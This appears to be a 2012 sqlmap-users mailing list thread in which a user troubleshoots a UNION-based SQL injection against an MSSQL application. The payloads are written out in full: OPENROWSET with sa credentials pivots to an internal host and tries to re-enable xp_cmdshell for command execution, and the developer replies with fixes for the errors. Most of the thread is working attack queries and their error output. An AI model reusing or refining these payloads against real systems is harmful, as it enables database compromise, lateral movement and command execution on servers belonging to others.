-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
select * from
OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
select @@version; master..sp_configure ''xp_cmdshell'',1
')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
the problem is with the query:
select @@version; master..sp_configure ''xp_cmdshell'',1
Any possibility to give the string from ascii codes as in mysql?
________________________________
From: Miroslav Stampar <miroslav.stam...@gmail.com>
To: Adi Mutu <adi_mut...@yahoo.com>
Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net>
Sent: Thursday, June 21, 2012 2:01 PM
Subject: Re: [sqlmap-users] error with ms sql
It all depends on context. You'll need to send a sample that you want to run.
Quotes are not interpreted/parsed everywhere the same.
Kind regards
On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi_mut...@yahoo.com> wrote:
my feeling is that
>"[OLE/DB provider returned message: Deferred prepare could not be completed."
>is because of an sql error:) so my fault.
>
>
>
>and regarding the second error, I think you must always return some columns in
>the query , such as select @@version.
>
>
>now question is how do i embed a string inside another string delimited with
>quotes? Looks like double quotes is not working.....doubling quote '' looks
>like not working always....
>
>
>
>________________________________
> From: Adi Mutu <adi_mut...@yahoo.com>
>To: Miroslav Stampar <miroslav.stam...@gmail.com>
>Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net>
>Sent: Thursday, June 21, 2012 11:45 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>
>tried, same stuff.
>I've tried to reenable xp_cmdshell first with
>
>
>master..sp_configure 'show advanced options',1
>reconfigure
>master..sp_configure 'xp_cmdshell',1
>reconfigure
>
>
>and got the same error: [OLE/DB provider returned message: Deferred prepare
>could not be completed.]
>
>
>then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
>and got error:
>
>
>OLE DB error trace [Non-interface error:
OLE DB provider unable to process object, since the object has no
columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc
"xp_cmdshell","xp_log70.dll" '].
>
>
>
>
>
>
>________________________________
> From: Miroslav Stampar <miroslav.stam...@gmail.com>
>To: Adi Mutu <adi_mut...@yahoo.com>
>Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net>
>Sent: Thursday, June 21, 2012 11:26 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>
>try with master..resultabcd
>
>
>i forgot to mention that there needs to be two dots (or schema name in
>between) between db name and table name in mssql
>
>
>On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>
>Hi Miroslav,
>>
>>
>>got db_name master and tried with master.resultabcd but i get the same error.
>>
>>
>>Kind Regards,
>>A.
>>
>>
>>
>>________________________________
>> From: Miroslav Stampar <miroslav.stam...@gmail.com>
>>To: Adi Mutu <adi_mut...@yahoo.com>
>>Cc: "sqlmap-users@lists.sourceforge.net" <sqlmap-users@lists.sourceforge.net>
>>Sent: Thursday, June 21, 2012 11:11 AM
>>Subject: Re: [sqlmap-users] error with ms sql
>>
>>
>>
>>Hi Adi.
>>
>>
>>You could try prepending the database name to the resultbcd. It seems that in
>>case of linked server(s) doing that fixes the mentioned problem (Reference:
>>http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)
>>
>>
>>Kind regards,
>>Miroslav Stampar
>>
>>
>>On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi_mut...@yahoo.com> wrote:
>>
>>I'm having an injection like this:
>>>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
>>>
>>>
>>>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
>>>select * from
>>>OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
>>> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from
>>>teachers7 where id=808
>>>
>>>
>>>
>>>and when I try to select form resultabcd i get:
>>>[OLE/DB provider returned message: Deferred prepare could not be completed.]
>>>
>>>
>>>
>>>could not find a good answer with google. Thanks.
>>>
>>>
>>>Kind regards,
>>>A.
>>>------------------------------------------------------------------------------
>>>Live Security Virtual Conference
>>>Exclusive live event will cover all the ways today's security and
>>>threat landscape has changed and how IT managers can respond. Discussions
>>>will include endpoint security, mobile security and the latest in malware
>>>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>_______________________________________________
>>>sqlmap-users mailing list
>>>sqlmap-users@lists.sourceforge.net
>>>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>>
>>--
>>Miroslav Stampar
>>http://about.me/stamparm
>>
>>
>>
>
>
>
>--
>Miroslav Stampar
>http://about.me/stamparm
>
>
>
>------------------------------------------------------------------------------
>Live Security Virtual Conference
>Exclusive live event will cover all the ways today's security and
>threat landscape has changed and how IT managers can respond. Discussions
>will include endpoint security, mobile security and the latest in malware
>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>_______________________________________________
>sqlmap-users mailing list
>sqlmap-users@lists.sourceforge.net
>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
--
Miroslav Stampar
http://about.me/stamparm------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
